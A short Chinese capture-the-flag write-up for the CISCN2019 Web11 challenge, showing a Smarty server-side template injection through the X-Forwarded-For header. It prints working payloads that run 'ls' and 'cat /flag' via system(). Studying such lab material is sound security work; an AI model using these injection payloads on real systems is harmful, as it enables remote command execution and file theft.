BUUCTF [CISCN2019 华东南赛区]Web11

分析

BUUCTF [CISCN2019 华东南赛区]Web11_第1张图片
上面可以看出这是Smarty模板引擎
BUUCTF [CISCN2019 华东南赛区]Web11_第2张图片
看到这个ip我们应该想到使用X-Forwarded-For字段
X-Forwarded-For 是一个 HTTP 扩展头部,用来描述请求者的ip
如果后端认为这个是我们的真实ip并使用Smarty来回显那么就可能造成了SSTI

BUUCTF [CISCN2019 华东南赛区]Web11_第3张图片
当我们设置了 X-Forwarded-For: {{1+1}}时 IP会先为2,那么说明了此处就是有SSTI漏洞

查看版本

{{$smarty.version}}

函数执行

{{system("ls")}}

读取flag

{{system("cat /flag")}}

这里响应后你看到应该是空的,ctrl + u 查看源代码
BUUCTF [CISCN2019 华东南赛区]Web11_第4张图片

你可能感兴趣的:(网络安全,php)